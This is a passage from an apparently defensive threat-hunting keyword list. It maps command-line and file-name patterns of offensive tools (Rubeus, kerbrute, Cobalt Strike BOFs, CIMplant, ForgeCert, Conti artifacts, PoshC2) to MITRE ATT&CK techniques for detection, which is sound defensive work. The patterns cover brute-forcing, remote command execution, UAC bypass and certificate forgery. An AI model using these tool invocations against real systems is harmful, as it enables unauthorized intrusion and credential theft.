broadcast-sonicwall-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-sybase-asa-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-tellstick-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-upnp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-versant-locate.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-wake-on-lan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-wpad-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-wsdd-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* broadcast-xdmcp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* bropper.py*,offensive_tool_keyword,bropper,An automatic Blind ROP exploitation tool ,T1068 - T1059.003 - T1140,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Hakumarachi/Bropper,1,0,N/A,7,2,175,18,2023-06-09T12:40:05Z,2023-01-20T14:09:19Z -* brute * /password*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* BruteForce(*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,0,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -* --brute-ratel*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -* Brutesploit*,offensive_tool_keyword,BruteSploit,BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. 
That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text,T1110,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/BruteSploit,1,0,N/A,N/A,7,665,261,2020-04-05T00:29:26Z,2017-05-31T17:00:51Z -* bruteuser *,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,0,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -* build Dent.go*,offensive_tool_keyword,cobaltstrike,A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/Dent,1,0,N/A,10,10,296,51,2023-08-18T17:28:54Z,2021-05-03T14:00:29Z -* -Build -NoAttackPaths*,offensive_tool_keyword,badazure,BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable 
tenants with multiple attack paths,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/mvelazc0/BadZure/,1,0,N/A,5,4,302,18,2023-07-27T15:40:41Z,2023-05-05T04:52:21Z -* build_letmeout*,offensive_tool_keyword,cobaltstrike,Project to enumerate proxy configurations and generate shellcode from CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/AggressiveProxy,1,0,N/A,10,10,139,26,2020-11-04T16:08:11Z,2020-11-04T12:53:00Z -* BypassFramework.py*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,0,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -* BypassUac*.bat*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* BypassUac*.dll*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* BypassUac*.exe*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* -c * --choose-mutators * -s 1*,offensive_tool_keyword,Bashfuscator,A fully configurable and extendable Bash obfuscation framework,T1027 - T1027.004 - T1059 - T1059.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Bashfuscator/Bashfuscator,1,0,N/A,10,10,1348,159,2023-09-05T10:40:25Z,2018-08-03T21:25:22Z -* -c * -o payload.ser*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,0,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -* -c *ExploitClass.cs*System.dll*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 
- T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* -c *OBFUSCATION=*.ps1*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,0,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -* -c '/accepteula /s calc.exe' -e PsExec64.exe*,offensive_tool_keyword,pywsus,The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.,T1505.003 - T1001.001 - T1560.001 - T1071.001,TA0003 - TA0011 - TA0002,N/A,N/A,Network Exploitation tools,https://github.com/GoSecure/pywsus,1,0,N/A,N/A,3,248,38,2022-11-11T19:59:21Z,2020-08-11T21:44:35Z -* -c active_users -u *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -c all -d * --domaincontroller *,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* -c command_exec --execute tasklist*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & 
Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -c command_exec --execute whoami*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -c CredEnum.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,0,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -* -c edr_query *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -c logon_events * -u *,offensive_tool_keyword,CIMplant,C# 
port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -c ls --directory * -u * -p *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -c process_kill --process *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -c service_mod --execute create -s *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -c upload --fileto * --file *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -c vacant_system * -u *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -c -w *.txt -w *.txt --ss 
*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* -c -w methods.txt -p 127.0.0.1*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* -c -w users.txt --hs *,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* -c -z file*users.txt -z file*pass.txt *,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* -c -z range*1-10 --hc=BBB http*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* C:\ProgramData\sh.txt*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* C:\temp\w.log*,offensive_tool_keyword,SharpEfsPotato,Local privilege escalation from SeImpersonatePrivilege using EfsRpc.,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bugch3ck/SharpEfsPotato,1,0,N/A,10,3,241,40,2022-10-17T12:35:06Z,2022-10-17T12:20:47Z -* C:\Users\Public\build.bat*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -* C:\Users\Public\build.vbs*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -* C:\Users\Public\DtcInstall.txt*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -* c2 add *,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - 
T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -* c2 start http *,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -* -c2server *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -* --CaCertPath *.pfx --CaCertPassword *,offensive_tool_keyword,ForgeCert,ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.,T1553.002 - T1136.003 - T1059.001,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/GhostPack/ForgeCert,1,0,N/A,10,6,538,87,2022-10-07T18:18:09Z,2021-06-09T22:04:18Z -* CallDirect.py*,offensive_tool_keyword,POC,Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? 
Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration,T1046 - T1595 - T1587,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/yunuscadirci/CallStranger,1,0,N/A,N/A,4,391,70,2021-08-07T16:48:55Z,2020-06-08T07:37:49Z -* CallStranger.py*,offensive_tool_keyword,POC,Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration,T1046 - T1595 - T1587,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/yunuscadirci/CallStranger,1,0,N/A,N/A,4,391,70,2021-08-07T16:48:55Z,2020-06-08T07:37:49Z -* -caplet *.cap,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -* cassandra-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* cassandra-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
